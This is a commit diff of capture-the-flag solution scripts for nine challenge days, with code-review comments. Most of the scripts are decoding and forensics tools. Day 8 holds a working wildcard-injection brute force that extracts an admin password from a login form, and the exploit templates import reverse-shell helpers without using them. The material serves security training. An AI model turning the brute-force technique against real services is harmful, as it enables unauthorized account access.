Initial Commit Day 1-9

Roman Hergenreder 2023-12-18 16:02:49 +01:00
commit 697849f63e
21 changed files with 4825 additions and 0 deletions

Binary file not shown.

32
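--- a/Day 1/decode.py
+++ b/Day 1/decode.py
@@ -0,0 +1,32 @@
+import string
+from bs4 import BeautifulSoup
+from PIL import Image
+from pyzbar.pyzbar import decode
+qr_size = 25
+pix_size = 10
+img_size = pix_size * qr_size
+with open("templates/santa.j2", "r") as f:
+soup = BeautifulSoup(f.read(), "html.parser")
+img = Image.new("RGB", (img_size, img_size), "white")
+y = 0
+for c in string.ascii_lowercase:
+bin_str = ""
+x = 0
+for e in soup.find_all("span"):
+if e.text.strip() == "{{" + c + "}}":
+if "a" in e["class"]:
+color = (0, 0, 0)
+else:
+color = (255, 255, 255)
+for xi in range(x, x+pix_size):
+for yi in range(y, y+pix_size):
+img.putpixel((xi, yi), color)
+x += pix_size
+y += pix_size
+print("[+] Flag:", decode(img)[0].data.decode())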
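Review bot: The last line indexes `decode(img)[0]` without checking that pyzbar returned a result, so any mistake in the reconstructed image ends in an unexplained IndexError. Keep the result in a variable and fail with a message, e.g. `results = decode(img)` followed by `if not results: raise SystemExit("[-] no QR code found in reconstructed image")`. `bin_str` is assigned on every pass and never read, so it can be removed. A short comment stating that spans carrying class `a` are drawn as dark modules and that each template variable `{{a}}` to `{{z}}` appears to select one row would document the encoding for the next reader.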

2
Day 1/templates/santa.j2 Normal file

File diff suppressed because one or more lines are too long

3
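--- a/Day 2/decode.py
+++ b/Day 2/decode.py
@@ -0,0 +1,3 @@
+data = "G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++"
+# "PGP++++" -> Philip Zimmerman
+print("[+] Flag: HV23{Philip Zimmerman}")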
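Review bot: `data` is assigned but never read and the printed flag is a literal, so this file records a manual solve rather than computing anything. Say so in a header comment, for example `# Geek Code block from the challenge; solved by hand from the PGP++++ field`, or move the block itself into that comment so the unused variable goes away.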

58
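--- a/Day 3/decode.py
+++ b/Day 3/decode.py
@@ -0,0 +1,58 @@
+data = [
+["8","c","t","k","3"],
+["2","r","H","V","r"],
+["2","y",None,"0","v"],
+["2","e","n","3","_"],
+["}","3","h","{","m"],
+]
+def find_char(c, min=(0, 0)):
+for x, row in enumerate(data):
+for y, v in enumerate(row):
+if v == c and (x, y) >= min:
+return (x, y)
+def find_key(cirb="HV23{"):
+min = (0, 0)
+key = []
+for c in cirb:
+key.append(find_char(c, min))
+min = key[-1]
+key[3] = (4, 1) # or (3, 3)
+key.append(rotate(find_char('}'), 3)) # for final '}'
+return key
+def rotate(key, rotation):
+rotation = rotation % 4
+if rotation == 0:
+return key
+n = len(data) - 1
+rotated = []
+if isinstance(key, list):
+for (x, y) in key:
+rotated.append((y, n - x))
+else:
+rotated = (key[1], n - key[0])
+if rotation > 1:
+return rotate(rotated, rotation - 1)
+return rotated
+def get_text(key, rotation=0):
+text = ""
+key = list(sorted(rotate(key, rotation)))
+for (x, y) in key:
+text += data[x][y]
+return text
+key = find_key()
+flag = ""
+for i in range(0, 4):
+flag += get_text(key, -i)
+print("[+] Flag:", flag)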
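Review bot: `find_char` falls off the end and returns None when no cell matches, and `find_key` then stores that None in `min`, so the next comparison `(x, y) >= min` fails with a TypeError far from the cause. End `find_char` with an explicit `raise ValueError(f"{c!r} not found at or after {min}")`. Both functions also use `min` as a parameter or local name, which shadows the builtin; `start` would read better. The override `key[3] = (4, 1)` replaces a searched position with a constant and deserves a comment explaining why the search result is not used, and `data[x][y]` would fail on the `None` centre cell if a key ever rotated onto it.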

BIN
Day 4/bowser.elf Executable file

Binary file not shown.

26
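--- a/Day 4/decode.py
+++ b/Day 4/decode.py
@@ -0,0 +1,26 @@
+from hackingscripts import util
+from pwn import context, disasm
+import re
+if __name__ == "__main__":
+with open("bowser.elf", "rb") as f:
+elf = f.read()
+context.arch = "amd64"
+offset = 0x1332
+flag = b""
+for instr in disasm(elf[offset:], byte=False, offset=False).split("\n"):
+match = re.match(r"movabs\s+(rax|rdx),\s+0x([0-9a-f]+)", instr)
+if match:
+flag += util.xor(bytearray.fromhex(match[2])[::-1], 0xFF)
+else:
+match = re.match(r"mov\s+WORD PTR \[.*\],\s+0x([0-9a-f]+)", instr)
+if match:
+flag += util.xor(bytearray.fromhex(match[1])[::-1], 0xFF)
+elif re.match(r"call\s+.*", instr):
+break
+flag = flag.split(b"\x00")[1].decode()
+print("[+] Flag:", flag)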
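Review bot: `bytearray.fromhex(match[2])` is given the immediate exactly as the disassembler prints it, so an immediate with an odd number of hex digits raises ValueError and one whose high bytes are zero decodes to fewer bytes than the operand holds. Pad to the operand width before converting: `match[2].zfill(16)` in the `movabs` branch and `match[1].zfill(4)` in the `WORD PTR` branch. `flag.split(b"\x00")[1]` also assumes a NUL byte is present and raises IndexError otherwise. `disasm(elf[offset:])` disassembles the rest of the file although the loop stops at the first `call`, so slicing a bounded window would be cheaper, and a comment recording how `offset = 0x1332` was determined would make the script reproducible against the checked-in binary.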

BIN
Day 5/aurora.mp4 Normal file

Binary file not shown.

47
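--- a/Day 5/decode.py
+++ b/Day 5/decode.py
@@ -0,0 +1,47 @@
+from PIL import Image
+import os
+import sys
+import operator
+import subprocess
+import shutil
+def extract_frames(destination):
+os.makedirs(destination, exist_ok=True)
+subprocess.run(["ffmpeg", "-i", "aurora.mp4", "frames/out-%03d.png"])
+print()
+def parse_frame(file):
+img = Image.open(file)
+pix = img.load()
+return img.size, pix
+if __name__ == "__main__":
+output_directory = "frames"
+pixel_sum = None
+count = 0
+extract_frames(output_directory)
+for file in sorted(os.listdir(output_directory)):
+if file.endswith(".png"):
+sys.stdout.write(f"\rAnalyzing: {file}")
+(width, height), pix = parse_frame(os.path.join(output_directory, file))
+if pixel_sum is None:
+pixel_sum = [[(0,0,0) for y in range(height)] for x in range(width)]
+for x in range(width):
+for y in range(height):
+pixel_sum[x][y] = tuple(map(operator.add, pixel_sum[x][y], pix[x,y]))
+count += 1
+print("\nComposing new image")
+img = Image.new("RGB", (width, height))
+pix = img.load()
+for x in range(width):
+for y in range(height):
+pix[x,y] = tuple(map(operator.floordiv, pixel_sum[x][y], [count] * 3))
+img.save(f"result.png")
+shutil.rmtree(output_directory)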
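Review bot: `extract_frames` creates `destination` but writes to the literal pattern `frames/out-%03d.png` and ignores ffmpeg's exit status, so a different directory name or a failed extraction only surfaces later as a NameError on `width`. Build the pattern from the parameter and let the call fail loudly: `subprocess.run(["ffmpeg", "-i", "aurora.mp4", os.path.join(destination, "out-%03d.png")], check=True)`. The final `shutil.rmtree(output_directory)` also deletes anything that was already in `frames` before the run; a directory from `tempfile.TemporaryDirectory()` would avoid that. `img.save(f"result.png")` carries an f-prefix with no placeholder.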

BIN
Day 5/result.png Normal file

Binary file not shown.


Width:  |  Height:  |  Size: 296 KiB

1
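--- a/Day 6/.gitattributes
+++ b/Day 6/.gitattributes
@@ -0,0 +1 @@
+memory.raw filter=lfs diff=lfs merge=lfs -text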

BIN
Day 6/cool-santa-claus.jpg Normal file

Binary file not shown.


Width:  |  Height:  |  Size: 186 KiB

3
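--- a/Day 6/extract.sh
+++ b/Day 6/extract.sh
@@ -0,0 +1,3 @@
+vol -f memory.raw windows.info
+vol -f memory.raw windows.filescan | grep -i "png\|jpg\|jpeg"
+vol -f memory.raw windows.dumpfiles --virtaddr 0x918b76c517f0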
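Review bot: The script has no shebang or `set -e`, and the address given to `windows.dumpfiles --virtaddr` is copied from the preceding `filescan` output without a word on which file it refers to. Add `#!/bin/sh` and `set -eu` at the top and a comment such as `# virtaddr of <file name from filescan output>` above the last line. For evidence handling it is worth verifying the image before analysis, e.g. `sha256sum memory.raw` compared with the oid recorded in the Git LFS pointer. `grep -iE 'png|jpe?g'` is the portable spelling of the alternation, since `\|` in a basic regular expression is a GNU extension.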

4480
Day 6/files.txt Executable file

File diff suppressed because it is too large Load Diff

3
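--- a/Day 6/memory.raw
+++ b/Day 6/memory.raw
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0d38311133ba9580a4bac36aee55f4f08a75f0462cc040907a179ad4b4351c87
+size 2147483648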

BIN
Day 6/wallpaper.png Normal file

Binary file not shown.


Width:  |  Height:  |  Size: 1.6 MiB

63
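--- a/Day 7/exploit.py
+++ b/Day 7/exploit.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+import string
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+import socket
+from PIL import Image
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+HOST = "44c5decd-6619-4ce0-859a-882ed74f1736.rdocker.vuln.land"
+IP_ADDRESS = util.get_address()
+def get_image_bytes():
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((HOST, 80))
+sock.sendall(b"\n")
+data = b""
+while True:
+b = sock.recv(1024)
+if not b:
+break
+data += b
+body_offset = data.index(b"\n\n") # malformed here
+header, body = data[:body_offset], data[body_offset+2:]
+return header, body
+if __name__ == "__main__":
+header, body = get_image_bytes()
+flag = ""
+while body:
+offset_index = body.index(b"\r\n")
+chunk_size = int(body[0:offset_index], 16)
+offset = offset_index + 2
+chunk = body[offset:offset+chunk_size]
+body = body[offset+chunk_size+2:]
+if chunk_size > 0x900:
+flag += chr(chunk_size & 0xFF)
+print("[+] Flag:", flag)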
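Review bot: `get_image_bytes` opens a socket with no timeout and never closes it, so a peer that keeps the connection open leaves the `recv` loop blocked indefinitely. Wrap the exchange in `with socket.create_connection((HOST, 80), timeout=10) as sock:` so the descriptor is released and a stall ends in an exception. `data.index(b"\n\n")` and `body.index(b"\r\n")` raise a bare ValueError on a truncated or differently framed response; checking `find()` for -1 and reporting what was received would make that diagnosable. Most of the template imports (`requests`, `subprocess`, `PIL`, `bs4`, `rev_shell`, `HttpFileServer` and others) and the `chunk` local are unused in this file, and the meaning of the `0x900` threshold should be stated in a comment.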

BIN
Day 8/bask-source.zip Normal file

Binary file not shown.

85
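--- a/Day 8/exploit.py
+++ b/Day 8/exploit.py
@@ -0,0 +1,85 @@
+#!/usr/bin/env python
+# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
+# https://git.romanh.de/Roman/HackingScripts
+import string
+import os
+import re
+import sys
+import json
+import time
+import base64
+import requests
+import subprocess
+import urllib.parse
+from bs4 import BeautifulSoup
+from hackingscripts import util, rev_shell
+from hackingscripts.fileserver import HttpFileServer
+from urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
+IP_ADDRESS = util.get_address()
+def request(method, uri, **kwargs):
+if not uri.startswith("/") and uri != "":
+uri = "/" + uri
+client = requests
+if "session" in kwargs:
+client = kwargs["session"]
+del kwargs["session"]
+if "allow_redirects" not in kwargs:
+kwargs["allow_redirects"] = False
+if "verify" not in kwargs:
+kwargs["verify"] = False
+if "proxies" not in kwargs:
+kwargs["proxies"] = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
+return client.request(method, BASE_URL + uri, **kwargs)
+def login(password):
+while True:
+# post payload is not URL decoded, so we can't use dictionary
+res = request("POST", "/login", data=f"password={password}")
+if "Successfully logged in" in res.text:
+return True
+elif "Invalid username or password!" in res.text:
+return False
+def retrieve_flag(cookie):
+while True:
+res = request("GET", "/admin", cookies={"admin_token": cookie})
+util.assert_content_type(res, "text/html")
+if "You are not authorized to view this page." in res.text:
+return None
+else:
+match = re.search(r"Your flag is: (HV23\{.*\})", res.text)
+if match:
+return match[1]
+if __name__ == "__main__":
+password = "salami"
+flag = retrieve_flag(password)
+while flag is None:
+found = False
+for x in string.printable:
+if x in ["*", "\\"]:
+continue
+if login(password + x + "*"):
+password += x
+found = True
+flag = retrieve_flag(password)
+break
+if not found:
+break
+print("[+] Flag:", flag)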
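Review bot: `request` defaults to `verify=False` with the urllib3 warning silenced at import time and sends every call through `http://127.0.0.1:8080`, so certificate validation is off for the HTTPS target and the script fails outright when no local proxy is listening. Make the proxy and the disabled verification opt-in through a command-line switch or environment variable, and leave verification on otherwise. `login` and `retrieve_flag` loop on `while True` and return only on known strings, so any other response, such as an error page, makes them re-send without delay or limit; a bounded retry count with a short sleep would end that cleanly. The three `if key not in kwargs` blocks read more simply as `kwargs.setdefault("allow_redirects", False)` and so on, and `client = kwargs.pop("session", requests)` replaces the session handling.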

22
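--- a/Day 9/decode.py
+++ b/Day 9/decode.py
@@ -0,0 +1,22 @@
+import os
+import re
+import datetime
+from bs4 import BeautifulSoup
+from hackingscripts.pcap_file_extract import PcapExtractor, HttpRequest, HttpResponse
+if __name__ == "__main__":
+chars = []
+pcap_extractor = PcapExtractor("secret_capture.pcapng")
+for response in pcap_extractor:
+match = re.match(r"/\?door=(\d)", response.get_file_path())
+if match and isinstance(response, HttpResponse):
+request = response.response_to
+ip, port = request.socket.split(":")
+port = int(port)
+c = chr(port - 56700)
+dt = datetime.datetime.strptime(response.headers["Date"], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
+chars.append((dt, c))
+flag = "".join(entry[1] for entry in sorted(chars))
+print("[+] Flag:", flag)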
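Review bot: The characters are ordered by `sorted(chars)` on `(dt, c)`, and the HTTP `Date` header has one-second resolution, so two responses stamped in the same second are ordered by character value rather than by capture order. Carry the capture index as the tie-breaker, `chars.append((dt, len(chars), c))`, and join on `entry[-1]`. `chr(port - 56700)` raises ValueError for a port below 56700, so a range check and a comment on where that base comes from would help. `os`, `BeautifulSoup` and `HttpRequest` are imported but unused, and the captured `door` digit is never read.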

BIN
Day 9/secret_capture.pcapng Normal file

Binary file not shown.